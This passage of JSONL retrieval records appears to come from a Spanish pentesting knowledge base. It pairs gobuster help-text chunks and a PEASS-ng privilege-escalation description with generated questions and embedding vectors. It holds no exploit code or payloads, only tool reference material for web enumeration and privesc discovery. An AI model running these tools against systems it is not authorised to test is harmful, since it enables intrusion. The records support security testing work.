-0.06642, 0.03065, -0.05276, -0.00045, 0.04072, 0.00123, 0.04985, -0.03386, 0.11686, 0.02112, -0.0936, -0.01266, -0.01377, 0.0141, -0.03873, 0.02516, 0.02069, -0.0169, 0.0652, 0.03116, 0.05033, -0.05426, -0.01695, -0.03375, 0.01469, 0.02806, 0.0065, 0.00113, 0.00578, -0.00531, -0.03836, 0.00149, 5e-05, 0.03707, 0.07934, -0.01878, -0.0173, -0.06819, 0.00681, 0.03734, -0.02629, 0.03672, 0.05801, -0.06173, 0.03668, 0.08124, 0.04442, 0.01199, -0.00914, 0.05109, 0.00601, -0.05081, 0.04808, -0.04636, 0.12061, -0.03195, 0.0058, -0.02207, -0.05389, 0.02381, 0.06137, 0.00365, -0.05597, 0.06048, 0.03403, 0.02105, 0.09582, -0.02248, -0.08689, 0.02934, -0.01998, 0.02774, 0.01269, -0.0401, -0.00592, 0.02747, 0.03313, -0.02995, 0.0879, 0.04281, 0.00564, -0.03498, 0.01168, -0.03702, -0.00962, -0.04453, 0.04152, 0.0115, 0.02372, -0.02249, -0.04705, 0.0146, 0.05253]} -{"tipo": "pregunta", "herramienta": "gobuster", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/gobuster.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "# gobuster β€” manual\n\nSalida de `gobuster --help`, capturada de la propia herramienta. Referencia completa de opciones (las invocaciones del dia a dia estan en el cheatsheet de comandos).\n\n```\nUsage:\n gobuster [command]\n\nAvailable Commands:\n completion Generate the autocompletion script for the specified shell\n dir Uses directory/file enumeration mode\n dns Uses DNS subdomain enumeration mode\n fuzz Uses fuzzing mode. Replaces the keyword FUZZ in the URL, Headers and the request body\n gcs Uses gcs bucket enumeration mode\n help Help about any command\n s3 Uses aws bucket enumeration mode\n tftp Uses TFTP enumeration mode\n version shows the current version\n vhost Uses VHOST enumeration mode (you most probably want to use the IP address as the URL parameter)", "indexar": "quΓ© herramienta sirve para buscar buckets en almacenamiento S3 o GCS?", "v": [0.10822, -0.03527, -0.18778, -0.06352, -0.03116, -0.22821, -0.08116, -0.07288, 0.04737, -0.00569, -0.21433, 0.04319, -0.126, -0.02794, 0.02101, 0.05829, 0.02067, -0.11199, -0.11034, 0.10703, -0.02252, -0.01044, -0.00477, -0.00969, -0.1111, 0.03799, 0.0486, -0.04697, -0.20935, 0.15377, 0.01827, 0.05293, -0.05083, -0.06354, -0.15994, -0.11975, -0.06901, 0.01047, -0.07411, -0.01632, 0.01128, 0.04283, -0.09887, 0.06067, -0.03433, -0.13705, 0.05653, 0.01587, -0.04578, -0.02841, -0.08427, -0.10697, -0.0445, 0.03117, -0.01975, -0.02731, 0.09735, -0.11146, 0.02835, -0.02073, -0.18455, 0.00437, 0.02105, -0.04242, 0.02404, -0.00889, -0.00685, -0.00792, -0.10496, -0.02716, -0.09645, -0.02221, 0.09877, -0.07283, -0.03095, 0.06947, 0.08894, 0.17001, 0.05403, -0.01045, 0.01808, -0.00928, -0.02063, 0.03093, -0.01922, -0.08156, 0.09187, -0.02778, 0.01153, -0.05672, 0.03028, 0.10361, -0.07446, 0.11269, -0.00039, -0.07153, 0.0765, 0.01233, 0.02883, -0.0201, 0.11717, -0.06697, -0.0385, 0.04108, -0.0469, 0.03992, -0.02, -0.05816, -0.03524, -0.04617, 0.12188, 0.05186, 0.08341, 0.06235, 0.00476, 0.07003, -0.02055, -0.0653, 0.00253, -0.00583, 0.03136, 0.00558, -0.03368, 0.00845, 0.09171, 0.08446, -0.05498, 0.03419, -0.0395, 0.00444, 0.01626, 0.01146, -0.08344, 0.03533, 0.03859, -0.09226, 0.00612, -0.07517, 0.03872, -0.10763, 0.01745, -0.0168, -0.03004, -0.08253, 0.00209, 0.01074, 0.07293, 0.00992, -0.04306, -0.07727, 0.10713, -0.02518, 0.00513, 0.03913, -0.01272, 0.04776, -0.02386, -0.06384, -0.12022, 0.01732, -0.04529, -0.0314, -0.03833, 0.05803, -0.04391, -0.06481, 0.05378, -0.04497, 0.04835, -0.01241, 0.00558, -0.09327, 0.02608, -0.0652, 0.00311, -0.04117, -0.02839, -0.02481, 0.06969, -0.0666, -0.09328, 0.00262, -0.08416, 0.04213, 0.0101, -0.11364, 0.051, -0.04805, 0.03007, 0.03131, 0.04241, 0.02742, 0.01001, -0.08535, 0.03183, -0.04739, 0.0133, -0.03927, 0.03784, -0.00018, -0.05686, 0.01701, 0.00548, 0.00529, 0.00481, 0.01928, -0.07263, 0.0135, 0.01539, 0.00325, 0.02055, -0.03459, 0.03345, -0.08972, -0.04271, -0.06189, -0.01975, 0.03323, -0.03451, 0.02497, -0.02434, 0.0093, -0.0058, -0.04974, -0.06363, 0.00293, 0.02794, 0.02748, 0.01185, -0.00721, 0.02498, 0.05772, 0.00793, 0.00244, 0.05392, -0.0409, 0.02172, 0.00053, -0.02196, 0.01247, -0.02691, 0.03098, -0.02741, 0.00882, -0.035, -0.00313, -0.0208, 0.01957, -0.01535, -0.07288, -0.04288, 0.04306, -0.00545, -0.05145, 0.03296, -0.05437]} -{"tipo": "pregunta", "herramienta": "gobuster", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/gobuster.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "# gobuster β€” manual\n\nSalida de `gobuster --help`, capturada de la propia herramienta. Referencia completa de opciones (las invocaciones del dia a dia estan en el cheatsheet de comandos).\n\n```\nUsage:\n gobuster [command]\n\nAvailable Commands:\n completion Generate the autocompletion script for the specified shell\n dir Uses directory/file enumeration mode\n dns Uses DNS subdomain enumeration mode\n fuzz Uses fuzzing mode. Replaces the keyword FUZZ in the URL, Headers and the request body\n gcs Uses gcs bucket enumeration mode\n help Help about any command\n s3 Uses aws bucket enumeration mode\n tftp Uses TFTP enumeration mode\n version shows the current version\n vhost Uses VHOST enumeration mode (you most probably want to use the IP address as the URL parameter)", "indexar": "cual es un software que permita realizar fuzzing en URLs y cabeceras?", "v": [0.12517, -0.05053, -0.165, 0.03572, 0.02926, -0.10007, 0.00026, -0.10609, -0.09185, -0.16751, -0.08955, 0.01238, -0.11694, -0.01919, -0.02024, -0.02463, 0.03468, 0.06666, 0.01858, -0.03945, 0.10276, -0.04116, -0.11416, -0.01236, -0.20172, -0.03946, 0.06802, -0.0569, -0.12447, -0.11953, 0.15306, 0.03764, 0.02411, -0.01222, -0.03458, 0.09647, -0.03803, 0.0504, -0.07905, -0.02722, -0.02883, 0.10194, -0.23917, 0.00429, 0.06653, -0.09785, -6e-05, -0.05255, 0.03863, -0.04112, 0.03311, 0.03101, -0.03778, -0.10806, -0.00185, -0.08307, 0.07942, -0.0782, -0.01124, -0.00077, -0.02954, 0.03378, 0.04497, -0.08117, -0.11104, 0.03255, 0.01762, -0.13037, -0.03153, 0.03835, 0.05879, 0.05309, 0.0245, -0.08159, 0.01786, -0.00942, -0.11932, 0.03313, 0.02959, -0.01814, 0.10003, -0.00869, -0.02277, 0.13254, -0.05047, -0.06488, 0.06811, -0.10616, -0.00204, -0.03399, -0.01655, 0.04911, -0.01928, 0.07696, -0.06319, 0.04598, 0.03006, 0.10838, -0.03117, 0.02959, -0.01594, 0.04248, -0.1403, 0.11527, 0.01004, 0.05813, 0.04706, -0.07101, 0.00677, 0.00776, -0.02758, 0.08251, 0.04504, -0.00906, -0.03611, -0.08981, -0.06676, -0.10036, 0.0479, -0.1989, 0.02256, -0.07183, 0.01777, -0.08232, 0.00456, 0.04427, 0.02771, 0.0388, -0.04189, -0.02613, 0.0472, -0.0557, 0.00416, -0.03017, -0.00611, 0.00843, 0.09643, 0.00289, 0.0638, 0.02329, -0.05939, 0.01107, 0.02211, 0.01479, 0.12767, -0.05634, -0.08929, -0.02166, -0.05033, -0.00479, -0.01688, 0.02058, -0.00674, -0.00027, -0.10675, -0.03784, 0.0235, -0.0314, 0.01037, 0.03637, -0.01544, 0.07334, -0.01914, -0.03437, 0.01708, -0.06217, -0.11323, 0.09023, 0.04902, 0.0212, -0.03044, 0.02405, -0.04126, -0.0262, 0.06677, -0.05813, -0.05883, -0.0931, 0.00059, -0.03138, -0.0611, 0.03387, -0.02824, -0.00063, -0.00145, -0.09258, -0.01536, 0.02982, -0.00834, 0.01345, 0.00637, -0.02568, -0.04562, -0.03561, 0.03726, -0.00356, -0.03775, -0.10118, -0.01384, 0.01475, -0.06898, -0.01543, -0.07283, -0.087, -0.01829, 0.0181, -0.01924, 0.00515, -0.08176, 0.03598, -0.0283, -0.06248, 0.04398, -0.05406, -0.00903, -0.0336, 0.0301, 0.03999, -0.00775, -0.0002, 0.02668, 0.03023, 0.04908, -0.04325, -0.01316, 0.01105, 0.0512, 0.11833, 0.01812, 0.0164, -0.06022, 0.00907, -0.00335, -0.03225, 0.04338, 0.00645, -0.00571, -0.01575, -0.03979, -0.09545, 0.01839, 0.07957, -0.01818, -0.05451, 0.06869, -0.03665, -0.09914, -0.03386, 0.01716, -0.08091, -0.00809, 0.04335, 0.01655, -0.00409, 0.09404, -0.02889]} -{"tipo": "pregunta", "herramienta": "gobuster", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/gobuster.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "Flags:\n --delay duration Time each thread waits between requests (e.g. 1500ms)\n -h, --help help for gobuster\n --no-color Disable color output\n --no-error Don't display errors\n -z, --no-progress Don't display progress\n -o, --output string Output file to write results to (defaults to stdout)\n -p, --pattern string File containing replacement patterns\n -q, --quiet Don't print the banner and other noise\n -t, --threads int Number of concurrent threads (default 10)\n -v, --verbose Verbose output (errors)\n -w, --wordlist string Path to the wordlist\n\nUse \"gobuster [command] --help\" for more information about a command.\n```", "indexar": "que herramienta sirve para escanear directorios web de forma rΓ‘pida?", "v": [0.04124, -0.04822, -0.21296, -0.13685, 0.0531, -0.14988, -0.07024, -0.11621, 0.05785, 0.04068, -0.0657, -0.08457, -0.01382, -0.24, 0.07552, 0.04596, 0.0992, -0.10923, 0.02455, 0.02297, -0.00514, 0.0464, -0.09129, 0.01107, -0.14685, -0.03385, -0.02941, 0.01633, -0.24843, 0.09857, 0.02234, 0.09337, 0.04811, -0.01965, -0.13274, -0.01915, 0.01003, -0.01455, -0.03329, 0.10184, -0.03894, 0.00159, -0.11977, 0.00257, -0.0628, 0.01378, -0.02628, 0.03021, 0.03395, 0.09992, 0.00324, -0.13349, -0.09606, 0.05944, -0.05052, -0.12822, 0.18959, -0.14564, 0.01862, -0.08869, -0.09047, -0.0066, -0.07317, -0.03015, -0.05293, 0.00961, -0.00054, -0.07864, -0.08543, -0.02534, -0.08595, 0.05193, 0.10492, 0.00922, -0.0166, -0.03773, -0.03893, 0.0992, 0.02138, 0.02995, 0.12611, -0.03378, -0.0844, -0.04106, -0.11489, -0.04001, 0.02818, -0.04889, 0.04313, -0.11347, 0.00605, 0.10737, -0.02595, 0.04429, 0.03548, -0.0623, 0.02564, 0.00201, 0.03011, -0.05083, 0.08496, -0.07711, -0.15794, 0.07711, 0.03108, 0.05331, -0.03379, 0.03163, -0.13932, 0.06598, 0.08281, 0.04274, 0.01609, -0.02939, -0.00849, 0.06704, -0.01649, -0.00823, -0.00681, -0.0402, 0.04845, -0.01886, -0.06816, 0.01163, -0.05431, 0.00255, -0.00246, 0.01381, 0.0087, -0.04686, -0.00889, -0.09178, -0.11619, 0.0196, -0.02475, -0.02503, 0.00253, -0.09145, 0.05682, -0.08593, 0.04447, -0.00835, -0.07797, -0.07798, -0.02357, -0.02691, 0.07418, -0.03675, -0.02127, -0.05605, 0.01602, -0.02249, -0.066, -0.01057, -0.06279, -0.04397, -0.00559, 0.02037, -0.09229, 0.0383, -0.04839, -0.04998, 0.10066, 0.04678, -0.05463, -0.06334, 0.00714, 0.01982, 0.04425, 0.03023, 0.04887, 0.05176, 0.01928, -0.08279, 0.00827, -0.00843, -0.06781, -0.01696, 0.0249, -0.04955, -2e-05, 0.0006, -0.05168, 0.01195, -0.02818, -0.04587, 0.0376, -0.02436, -0.03538, 0.05206, 0.03772, 0.02782, 0.01402, -0.0691, 0.01501, 0.02269, -0.02512, -0.03261, 0.03945, -0.04468, -0.06296, -0.02829, -0.01309, -0.05293, -0.00248, 0.04967, 0.00732, -0.05895, 0.00496, 0.00612, 0.00726, 0.0129, 0.05158, -0.02217, 0.04279, -0.03815, 0.06388, 0.02271, -0.03189, -0.0256, -0.0201, -0.05026, 0.01706, 0.01727, 0.0004, 0.02486, 0.0083, -0.04025, -0.01217, -0.0311, 0.01915, -0.05729, 0.00267, -0.05443, 0.03111, -0.07621, 0.02173, -0.02067, -0.06273, 0.0212, -0.00538, 0.05085, -0.01938, 0.04022, -0.03984, -0.06283, -0.01097, -0.05335, -0.03313, -0.05032, -0.03855, -0.02224, 0.02077, -0.03726, -0.00335, -0.00118]} -{"tipo": "pregunta", "herramienta": "gobuster", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/gobuster.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "Flags:\n --delay duration Time each thread waits between requests (e.g. 1500ms)\n -h, --help help for gobuster\n --no-color Disable color output\n --no-error Don't display errors\n -z, --no-progress Don't display progress\n -o, --output string Output file to write results to (defaults to stdout)\n -p, --pattern string File containing replacement patterns\n -q, --quiet Don't print the banner and other noise\n -t, --threads int Number of concurrent threads (default 10)\n -v, --verbose Verbose output (errors)\n -w, --wordlist string Path to the wordlist\n\nUse \"gobuster [command] --help\" for more information about a command.\n```", "indexar": "cual es una alternativa libre a Gobuster para probar la seguridad de mis pΓ‘ginas?", "v": [-0.12666, 0.03164, -0.08629, -0.07935, -0.12628, -0.08924, -0.01685, -0.06953, -0.17221, -0.09081, -0.01752, -0.03078, -0.07242, 0.08567, 0.06557, -0.11065, 0.03212, -0.01771, 0.05411, 0.05166, 0.0347, -0.00199, -0.05318, -0.09429, -0.00793, -0.0861, -0.01278, -0.05318, -0.07253, 0.01404, -0.0558, -0.09856, 0.02406, -0.07445, -0.18944, 0.04592, 0.214, -0.00241, 0.06144, 0.04942, 0.01847, -0.14122, -0.01478, 0.05977, 0.06845, -0.09157, -0.00249, -0.02329, -0.00756, 0.06613, -0.06066, -0.02697, -0.01854, -0.07568, 0.02371, -0.02478, 0.11322, -0.12595, 0.01216, 0.02713, -0.1128, 0.00584, 0.06497, -0.02067, 0.03742, -0.03203, -0.08907, 0.04062, -0.0997, 0.05604, 0.08809, 0.03715, 0.02505, 0.04998, -0.06464, -0.02161, -0.04231, 0.04667, 0.09119, 0.07165, 0.00555, 0.01584, -0.05081, 0.07506, -0.10454, -0.09802, -0.03301, -0.09549, 0.01537, 0.10072, 0.11564, 0.01224, 0.03368, 0.07606, -0.04137, -0.11806, 0.08821, 0.04438, -0.0231, -0.0669, 0.09708, -0.00364, -0.11275, -0.03131, -0.02561, -0.07366, -0.09904, 0.11212, -0.04018, -0.05926, -0.04676, 0.04878, -0.07784, 0.03743, -0.02287, -0.02663, -0.04826, 0.02083, 0.01252, -0.02973, -0.07467, -0.00971, -0.13818, -0.00922, 0.109, 0.10983, 0.04263, 0.04681, -0.07683, -0.06026, 0.08256, -0.07618, -0.12324, 0.01523, -0.08686, 0.04485, 0.01355, -0.11404, 0.00792, -0.06424, 0.04403, 0.04331, 0.0231, -0.0131, -0.01092, 0.02822, -0.03021, 0.04094, -0.06667, 0.02533, -0.09678, -0.01941, 0.00145, 0.13657, -0.03554, 0.0009, -0.06354, -0.06046, 0.01616, 0.0347, 0.07806, 0.02656, 0.02165, 0.03167, 0.02885, -0.01674, -0.03783, -0.075, -0.01876, 0.0001, -0.03521, 0.01772, 0.10657, -0.07927, 0.06095, -0.03477, -0.0391, -0.09291, 0.02774, -0.07971, 0.02839, -0.00793, -0.0558, 0.01643, 0.03845, -0.12037, 0.03879, -0.03725, 0.04686, 0.01329, 0.0216, 0.05066, -0.10212, -0.06119, -0.0254, -0.01131, 0.033, -0.11219, -0.03961, -0.01152, -0.04682, -0.04717, -0.02961, -0.01323, 0.01487, -0.0199, -0.02488, 0.05487, -0.02277, 0.02435, 0.07497, -0.02578, 0.06343, -0.05112, -0.06095, -0.03632, 0.0806, -0.0565, -0.03942, 0.00085, 0.0975, 0.03095, 0.00964, -0.0027, -0.00231, 0.00969, 0.0318, 0.02953, -0.00992, -0.00959, 0.03679, -0.00371, -0.08405, -0.00472, 0.02125, 0.00519, 0.02014, 0.07114, -0.01332, -0.07859, -0.02484, 0.08836, -0.0549, -0.01126, -0.03159, 0.01586, -0.10554, 0.01705, 0.03134, -0.02567, -0.05044, 0.05173, 0.03064, -0.01028, 0.02086, -0.01845]} -{"tipo": "pregunta", "herramienta": "gobuster", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/gobuster.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "Flags:\n --delay duration Time each thread waits between requests (e.g. 1500ms)\n -h, --help help for gobuster\n --no-color Disable color output\n --no-error Don't display errors\n -z, --no-progress Don't display progress\n -o, --output string Output file to write results to (defaults to stdout)\n -p, --pattern string File containing replacement patterns\n -q, --quiet Don't print the banner and other noise\n -t, --threads int Number of concurrent threads (default 10)\n -v, --verbose Verbose output (errors)\n -w, --wordlist string Path to the wordlist\n\nUse \"gobuster [command] --help\" for more information about a command.\n```", "indexar": "con quΓ© programa puedo realizar un ataque de fuerza bruta al buscar archivos ocultos en el servidor?", "v": [0.10418, -0.02614, -0.1983, -0.11666, -0.10515, -0.00785, 0.09427, -0.0227, 0.00715, -0.09495, -0.0771, -0.05741, 0.02007, 0.05723, 0.0329, -0.05375, 0.15007, -0.08321, -0.00358, 0.00811, 0.02304, -0.05776, 0.11811, -0.07011, -0.12042, -0.04551, -0.02348, 0.15491, -0.07443, -0.10179, -0.02269, 0.0533, 0.12946, -0.03268, 0.10281, 0.01465, -0.02381, 0.09399, 0.05527, 0.05137, -0.02136, 0.05992, -0.16759, 0.02632, 0.02933, -0.02824, 0.04106, 0.01233, 0.05161, -0.05149, -0.07225, -0.05959, -0.15709, -0.05811, -0.03514, -0.10046, 0.00305, -0.16784, -0.00787, 0.0334, -0.12007, 0.076, -0.02009, -0.10778, 0.03885, 0.00755, 0.00383, 0.00403, -0.0985, -0.02639, -0.08659, 0.0104, -0.01207, -0.01653, -0.01135, 0.04476, 0.00992, 0.00234, -0.01628, -0.0124, -0.04627, 0.06118, -0.10009, 0.10001, -0.14745, -0.0928, 0.04058, -0.01768, -0.10135, -0.04708, 0.09416, 0.02975, -0.07499, 0.08186, -0.03455, -0.00808, 0.1107, -0.0519, -0.02212, -0.0094, -0.01181, -0.05626, -0.0972, 0.08572, 0.07431, 0.09808, 0.01514, -0.02184, -0.0204, 0.02132, 0.04325, -0.08954, -0.06504, 0.02612, -0.05759, -0.00889, -0.07259, -0.06411, 0.04865, 0.0224, -0.13678, 0.04965, -0.04749, 0.11744, 0.02834, -0.04808, 0.06071, 0.0528, -0.03674, -0.03209, 0.01996, 0.01634, 0.00172, -0.0315, -0.07656, -0.02856, 0.08139, -0.06347, -0.05796, -0.0728, 0.07734, -0.00186, 0.00707, -0.00625, 0.1246, 0.02168, 0.04992, -0.06134, -0.07659, -0.02956, 0.03791, -0.04977, 0.03146, 0.04456, -0.09092, -0.01613, 0.0289, -0.13328, -0.11522, 0.06135, -0.04032, 0.04597, -0.16495, -0.0004, 0.02008, -0.02959, -0.03296, -0.01493, 0.08492, 0.00815, -0.02762, -0.00488, 0.01291, -0.06868, -0.01603, -0.0137, -0.03651, -0.07394, 0.06135, 0.01586, -0.0333, 0.03185, -0.00602, 0.04094, -0.05461, -0.04903, 0.07535, -0.01021, 0.00071, -0.01636, 0.03548, -0.00787, -0.08027, 0.07224, -0.02154, -0.10005, -0.05852, 0.04992, 0.02284, -0.0374, -0.02663, -0.06335, -0.03082, -0.01701, 0.02651, 0.03121, -0.03419, -0.00343, 0.02794, 0.06459, -0.00289, -0.06582, 0.12006, -0.09764, -0.04227, -0.01084, -0.00473, -0.01127, 0.04229, 0.02356, -0.01752, 0.04581, 0.04887, 0.04735, 0.01226, -0.0363, 0.01567, -0.04064, 0.04475, 0.02579, -0.0666, -0.06517, -0.04485, -0.01636, 0.02598, -0.02418, 0.01956, -0.00141, -0.09458, -0.03337, -0.0009, 0.0872, 0.01051, -0.07431, -0.0292, -0.0472, -0.0323, 0.00652, -0.01245, -0.01474, -0.02742, 0.05549, 0.05894, -0.04859, 0.06731, -0.02033]} -{"tipo": "pregunta", "herramienta": "PEASS-ng", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/PEASS-ng.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "# PEASS-ng (winPEAS / linPEAS)\n\n> Scripts que **enumeran automΓ‘ticamente** todos los vectores de privesc. En `tu carpeta`.", "indexar": "que programa hay para enumerar automΓ‘ticamente los vectores de privilegiaciΓ³n en mi sistema actual", "v": [0.088, 0.08655, -0.11654, -0.11715, 0.09761, 0.03097, 0.11133, -0.13504, -0.14146, -0.15778, -0.05731, -0.05617, -0.01345, -0.10032, 0.10367, 0.09926, 0.02696, -0.25262, 0.04374, 0.09268, 0.05925, -0.08202, 0.0108, -0.03872, -0.03265, 0.03581, 0.03592, -0.01724, -0.07547, 0.09806, 0.06612, 0.04987, 0.07632, -0.1562, -0.0133, -0.02653, 0.04746, 0.07106, -0.03885, 0.00744, 0.1375, 0.0421, -0.02931, 0.00514, 0.08891, -0.02425, 0.01573, 0.01878, -0.05764, -0.1371, -0.035, 0.05985, -0.0514, -0.02767, 0.03905, -0.05653, -0.07158, 0.03205, -0.03671, 0.07598, -0.00849, 0.05004, -0.01788, -0.06709, 0.03848, 0.04745, 0.05343, -0.08683, -0.06916, 0.09357, -0.05033, -0.09691, 0.08554, 0.00757, -0.00014, 0.04543, -0.01186, -0.03681, -0.00505, -0.00677, -0.06812, -0.0743, -0.03557, 0.14581, 0.02173, 0.0034, 0.0371, 0.0105, -0.00238, -0.01378, -0.02099, 0.01289, 0.05807, 0.05764, 0.11108, -0.04255, 0.08211, 0.03986, 0.08801, 0.06397, 0.08304, -0.0958, -0.10218, 0.16636, 0.01403, 0.03374, 0.09146, -0.0734, -0.02492, -0.02771, -0.04572, -0.02382, 0.01272, -0.0613, -0.08389, -0.05307, -0.02023, 0.03718, 0.06407, -0.08528, -0.09256, -0.04319, -0.0588, -0.01179, 0.05796, -0.04483, -0.07785, 0.10863, 0.02493, 0.05871, 0.02046, 0.01346, -0.06366, -0.03773, -0.07797, -0.05187, -0.01215, -0.00479, 0.02257, -0.06919, 0.00666, 0.09676, 0.0342, -0.11347, 0.07363, -0.04057, 0.06826, -0.11839, -0.0633, -0.02171, -0.06247, 0.03471, 0.03847, 0.04612, -0.07436, -0.00599, 0.02183, 0.01035, 0.03274, 0.00896, 0.0198, -0.00499, -0.05711, -0.03791, 0.06321, -0.04098, -0.00167, -0.05198, 0.05881, 0.02304, -0.00855, 0.07246, 0.03694, -0.00944, -0.06949, -0.0189, -0.02524, -0.09556, 0.09474, 0.01602, -0.09082, 0.06963, 0.08058, -0.03732, -0.06756, -0.01782, -0.02631, 0.04989, 0.07541, 0.02232, 0.03741, 0.02996, -0.0185, -0.01466, -0.04853, -0.0298, -0.05521, 0.00071, 0.02345, -0.03561, -0.05723, 0.02845, 0.06773, -0.01114, -0.0003, 0.1156, 0.04259, -0.04623, 0.05025, 0.13126, -0.00549, -0.01323, 0.05498, 0.03848, -0.01054, 0.02578, 0.03673, 0.01298, 0.01499, -0.05983, 0.02928, -0.01895, 0.03733, 0.0826, -0.03153, -0.06664, -0.00015, 0.09477, 0.05631, 0.01061, -0.04295, -0.04322, 0.01557, -0.06179, 0.02595, 0.00285, -0.00705, -0.08107, -0.02118, -0.0761, 0.06262, 0.0718, -0.00558, -0.0683, -0.02261, -0.06309, -0.0682, -0.04271, 0.01681, -0.03599, -0.02005, 0.03583, 0.01505, -0.08654, 0.02505, 0.00494]} -{"tipo": "pregunta", "herramienta": "PEASS-ng", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/PEASS-ng.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "# PEASS-ng (winPEAS / linPEAS)\n\n> Scripts que **enumeran automΓ‘ticamente** todos los vectores de privesc. En `tu carpeta`.", "indexar": "con quΓ© puedo hacer un escaneo rΓ‘pido de mis archivos locales buscando vulnerabilidades comunes", "v": [-0.03381, 0.03739, -0.14502, -0.08093, -0.09489, -0.0808, 0.00224, -0.04272, -0.13842, -0.09431, -0.10449, -0.0461, -0.04287, -0.01428, 0.07608, 0.02106, 0.11417, -0.01496, 0.07976, 0.03628, -0.12146, -0.07993, -0.03524, 0.04858, 0.0124, -0.07866, -0.05345, 0.04009, -0.07905, -0.03297, -0.07698, 0.11567, 0.06412, 0.11924, -0.08981, 0.0594, 0.0725, 0.02133, -0.04708, -0.03156, 0.07174, 0.08225, -0.20511, -0.11463, -0.03262, -0.13882, -0.13767, -0.10679, -0.04052, -0.03629, -0.11474, -0.05956, -0.14417, -0.05321, -0.00751, -0.00381, 0.08013, -0.10967, 0.04655, -0.02574, -0.16247, 0.00781, 0.06362, -0.01116, -0.01451, 0.01765, -0.00308, 0.07625, -0.12578, 0.10881, -0.01827, 0.111, 0.08517, -0.00958, -0.07172, 0.03166, -0.04997, -0.02418, 0.04456, -0.02673, 0.0573, 0.03448, 0.05955, -0.00184, -0.17343, -0.11248, 0.06462, -0.05698, 0.04565, 0.00975, 0.13095, -0.07948, 0.01048, -0.00368, 0.0203, -0.02672, 0.10085, 0.04823, -0.07986, 0.05733, -0.09249, -0.10971, -0.10074, 0.16639, 0.08669, 0.03009, -0.02719, 0.11126, 0.00033, -0.08709, 0.05044, 0.02489, -0.04112, 0.04146, -0.05965, 0.05121, -0.01006, -0.00818, 0.0584, 0.07789, -0.01405, -0.12127, -0.00329, 0.0133, -0.00703, -0.00824, 0.0233, -0.00591, 0.00428, 0.06055, 0.05943, -0.01554, -0.03683, -0.02299, -0.02375, 0.03868, 0.10846, -0.06434, -0.00154, -0.02852, 0.04653, -0.03053, 0.02311, 0.03988, 0.00843, 0.1038, 0.03333, -0.0554, -0.09304, -0.02388, -0.00702, -0.01707, -0.07184, -0.04154, -0.07963, 0.00918, 0.04019, -0.09637, 0.01821, 0.05438, 0.03668, 0.08479, -0.06657, 0.05462, -0.03683, -0.08947, 0.02929, 0.02588, 0.04937, -0.01799, 0.00927, 0.10798, -0.0, -0.10815, 0.04623, 0.03615, 0.0357, -0.07102, 0.02219, -0.06246, 0.00741, 0.03786, 0.01605, 0.11516, 0.00202, -0.02174, 0.05162, -0.00612, 0.03174, 0.04503, 0.01974, -0.06043, 0.00547, 0.02415, -0.0367, -0.01236, 0.00184, 0.01884, -0.06678, -0.03152, -0.07747, -0.0393, -0.04271, 0.01942, 0.07667, 0.03954, -0.06011, -0.04965, 0.0183, 0.05882, -0.05378, 0.03475, 0.10524, -0.00642, 0.00776, -0.04132, -0.00462, 0.00047, 0.0184, -0.03369, 0.00497, -0.02204, 0.05605, 0.02878, 0.01097, -0.00206, -0.0053, -0.08526, 0.01644, 0.05519, 0.00209, -0.00597, -0.08624, -0.02477, 0.03402, 0.00641, 0.004, 0.01094, -0.00595, 0.03055, 0.02409, -0.00929, -0.01059, 0.00823, -0.03254, -0.01844, -0.04325, 0.02395, 0.02688, -0.01362, -0.0037, 0.06402, 0.03103, -0.0115, 0.00448, -0.03734]} -{"tipo": "pregunta", "herramienta": "PEASS-ng", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/PEASS-ng.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "# PEASS-ng (winPEAS / linPEAS)\n\n> Scripts que **enumeran automΓ‘ticamente** todos los vectores de privesc. En `tu carpeta`.", "indexar": "existen scripts gratuitos que detectan automΓ‘ticamente las posibles brechas de seguridad en tu carpeta?", "v": [0.23316, 0.05907, -0.15208, -0.12878, 0.02852, -0.16963, -0.11657, 0.00735, -0.02404, -0.07707, -0.05428, -0.04318, -0.07104, -0.01687, 0.08118, -0.01211, 0.0027, -0.06774, 0.07704, -0.0981, 0.04712, -0.11193, 0.04431, -0.06845, -0.08567, -0.04232, 0.02028, 0.03499, -0.16616, 0.04881, 0.05944, 0.06772, 0.14699, 0.06226, -0.07872, 0.01144, -0.02522, -0.04831, 0.04779, 0.11489, 0.08814, 0.05842, -0.03885, 0.05532, 0.10553, -0.06444, 0.04243, -0.00757, -0.01317, -0.04971, -0.03653, -0.04673, -0.06192, -0.10065, -0.01876, -0.02126, 0.1095, -0.10858, -0.02427, 0.02253, -0.06778, 0.02957, 0.0156, 0.07337, 0.01548, 0.0268, 0.13952, -0.05959, -0.0667, 0.01852, 0.06664, -0.002, 0.03179, 0.10821, -0.02609, 0.02477, -0.12466, -0.09547, -0.03488, 0.1317, -0.03616, -0.02135, 0.0548, 0.00541, -0.12201, -0.14173, -0.08155, -0.02335, -0.05967, -0.03494, 0.11536, 0.0471, 0.03577, 0.11335, 0.06433, -0.02781, 0.10504, -0.09172, 0.00144, 0.07291, -0.11492, -0.11566, -0.03379, 0.11325, 0.01158, 0.06585, -0.02171, 0.07243, -0.0087, -0.11099, 0.06514, 0.01353, -0.02908, 0.02281, -0.03481, -0.05544, 0.05523, 0.03493, 0.07512, 0.01749, -0.05969, -0.03876, -0.07138, 0.02279, 0.00751, -0.03945, -0.0244, 0.05958, -0.05107, 0.02873, -0.04268, -0.04413, -0.12163, -0.09255, -0.06386, 0.09871, -0.04667, -0.04064, -0.06365, -0.00381, 0.05715, 0.04827, 0.07202, -0.00473, 0.05546, -0.03617, -0.01491, -0.07636, 0.0146, -0.0077, 0.02203, 0.04542, -0.04701, 0.02022, 0.0589, -0.00271, -0.03428, -0.02365, -0.04202, -0.02267, 0.09259, -0.04761, -0.03153, 0.07171, 